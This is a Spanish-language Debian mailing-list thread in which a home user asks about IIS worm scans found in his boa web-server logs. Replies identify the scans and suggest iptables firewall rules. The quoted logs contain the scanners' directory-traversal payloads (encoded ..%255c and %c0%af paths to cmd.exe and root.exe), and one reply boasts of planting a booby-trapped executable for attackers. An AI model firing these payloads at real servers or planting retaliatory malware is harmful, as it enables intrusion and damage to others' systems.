Re: Ataque al web server
A mi me ocurre lo mismo, pero no le doy importancia... ahora pienso en aquello pobres diablos que utilicen IIS pobrecillos. Raúl Hernández escribió: Hola a [EMAIL PROTECTED], tengo un servidor web montado con boa (sencillo y eficaz) para poder ver la documentación de Debian desde Mozilla con dwww. Esta máquina también hace de pasarela de mi mini-red local conectando por ppp a inet. Hoy me ha dado por revisar los logs de bos y me encuentro: 62.147.188.173 - - [25/Jan/2004:01:29:44 +] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:47 +] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:50 +] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:53 +] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:55 +] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:57 +] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:00 +] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:02 +] "GET 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 62.147.188. HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:05 +] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:10 +] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:11 +] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:12 +] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:13 +] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:14 +] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:16 +] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:18 +] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que esto viene del exterior. ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos son WINDOG y no existen en mi sistema. ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf para evitar estos temas? También tengo las directivas en /etc/hosts.deny: ALL: PARANOID ALL: ALL y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo que no me explico cómo han podido acceder desde inet siendo IPs fuera del rango permitido. Gracias y ...
Re: Ataque al web server
62.147.188.173 - - [25/Jan/2004:01:29:44 +] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" Bueno, yo hago otra cosa: Recreo la ruta que andan buscando y ahi, precisamente ahi, les pongo un ejecutable para windows, que es lo que esperan. El ejecutable tiene el nombre que andan buscando, y esta justo donde lo andan buscando. Claro que, no es oro todo lo que reluce. Van por lana y salen trasquilados. Algunos, muy-muy trasquilados. Manolete, ¿si no sabes torear ... pa que te metes? ;-) -- --- Esto es una trampa para spammers: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]@bsa.org [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]@aol.com [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]@cmt.es [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Si NO eres spammer, NO envies correo a ninguna de estas direcciones. ---
Re: Ataque al web server
En realidad lo que tenés que hacer es correrte un script iptables cuando te conectás, de modo que tus puertos queden protegidos por un firewall. Leete el iptables-howto de linuxdoc.org y cualquier cosa que no esntiendas preguntá. Sds On Sun, Feb 08, 2004 at 12:22:28PM +0100, Raúl Hernández wrote: > Hola a [EMAIL PROTECTED], > > tengo un servidor web montado con boa (sencillo y eficaz) para poder > ver la documentación de Debian desde Mozilla con dwww. > > Esta máquina también hace de pasarela de mi mini-red local conectando > por ppp a inet. > > Hoy me ha dado por revisar los logs de bos y me encuentro: > > 62.147.188.173 - - [25/Jan/2004:01:29:44 +] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:47 +] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:50 +] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:53 +] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:55 +] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:29:57 +] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:00 +] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:02 +] "GET > 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > 62.147.188. HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:05 +] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:10 +] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:11 +] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:12 +] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:13 +] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:14 +] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:16 +] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 > "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:18 +] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > > Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que > esto viene del exterior. > > ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el > futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos > son WINDOG y no existen en mi sistema. > > ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf > para evitar estos temas? > > También tengo las directivas en /etc/hosts.deny: > ALL: PARANOID > ALL: ALL > y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo > que no me explico cómo han podido acceder desde inet siendo IPs fuera > del rango permitido. > > Gracias y ... > -- > Un saludo. > Raúl Hernández <[EMAIL PROTECTED]> > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- Fernando M. Maresca Cel: (54) 221 15 502 3938 Cel: 0221-15-502-3938
Re: Ataque al web server
Raúl Hernández escribió: Hola a [EMAIL PROTECTED], tengo un servidor web montado con boa (sencillo y eficaz) para poder ver la documentación de Debian desde Mozilla con dwww. Esta máquina también hace de pasarela de mi mini-red local conectando por ppp a inet. ... Hola Raúl: Cómo según entiendo por lo que dices entiendo que el servidor de http debería escuchar solo a dentro de la red, podrías usar iptables para bloquear el trafico entrante al puerto 80 por la if de internet. Por ejemplo en mi caso sería algo asi como: iptables -A INPUT -i eth1 -p tcp --dport 80 -j DROP y en tu caso supongo que deberías sustituir eth1 por ppp0 o algo asi. Posiblemente tambien puedes configurar boa para que no escuche a las conexiones desde internet, pero eso ya no se como se hace. ¿Has leido el manual de boa? De todas maneras, los que te estaba sucediendo no son ataques contra ti especificamente, son scanners que prueban masivamente bugs del ISS contra rangos de ips. Espero que te sirva mi respuesta. Saludos, Mikel
Re: Ataque al web server
Son los gusanos esos, q atacan a windows. No te calientes. Podes mirar de q haga log cuando resuelve host nomas . - Original Message - From: "Raúl Hernández" <[EMAIL PROTECTED]> To: "Lista Debian en español" Sent: Sunday, February 08, 2004 8:22 AM Subject: Ataque al web server > Hola a [EMAIL PROTECTED], > > tengo un servidor web montado con boa (sencillo y eficaz) para poder > ver la documentación de Debian desde Mozilla con dwww. > > Esta máquina también hace de pasarela de mi mini-red local conectando > por ppp a inet. > > Hoy me ha dado por revisar los logs de bos y me encuentro: > > 62.147.188.173 - - [25/Jan/2004:01:29:44 +] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:47 +] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:50 +] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:53 +] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:29:55 +] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:29:57 +] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:00 +] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:02 +] "GET > 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c ../winnt/system32/cmd.exe?/c+dir > 62.147.188. HTTP/1.0" 404 0 "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:05 +] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:10 +] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:11 +] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:12 +] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:13 +] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:14 +] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > 62.147.188.173 - - [25/Jan/2004:01:30:16 +] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 > "-" "-" > 62.147.188.173 - - [25/Jan/2004:01:30:18 +] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" > "-" > > Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que > esto viene del exterior. > > ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el > futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos > son WINDOG y no existen en mi sistema. > > ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf > para evitar estos temas? > > También tengo las directivas en /etc/hosts.deny: > ALL: PARANOID > ALL: ALL > y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo > que no me explico cómo han podido acceder desde inet siendo IPs fuera > del rango permitido. > > Gracias y ... > -- > Un saludo. > Raúl Hernández <[EMAIL PROTECTED]> > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] >
Ataque al web server
Hola a [EMAIL PROTECTED], tengo un servidor web montado con boa (sencillo y eficaz) para poder ver la documentación de Debian desde Mozilla con dwww. Esta máquina también hace de pasarela de mi mini-red local conectando por ppp a inet. Hoy me ha dado por revisar los logs de bos y me encuentro: 62.147.188.173 - - [25/Jan/2004:01:29:44 +] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:47 +] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:50 +] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:53 +] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:55 +] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:29:57 +] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:00 +] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:02 +] "GET 62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 62.147.188. HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:05 +] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:10 +] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:11 +] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:12 +] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:13 +] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:14 +] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:16 +] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" 62.147.188.173 - - [25/Jan/2004:01:30:18 +] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-" Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que esto viene del exterior. ¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos son WINDOG y no existen en mi sistema. ¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf para evitar estos temas? También tengo las directivas en /etc/hosts.deny: ALL: PARANOID ALL: ALL y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo que no me explico cómo han podido acceder desde inet siendo IPs fuera del rango permitido. Gracias y ... -- Un saludo. Raúl Hernández <[EMAIL PROTECTED]>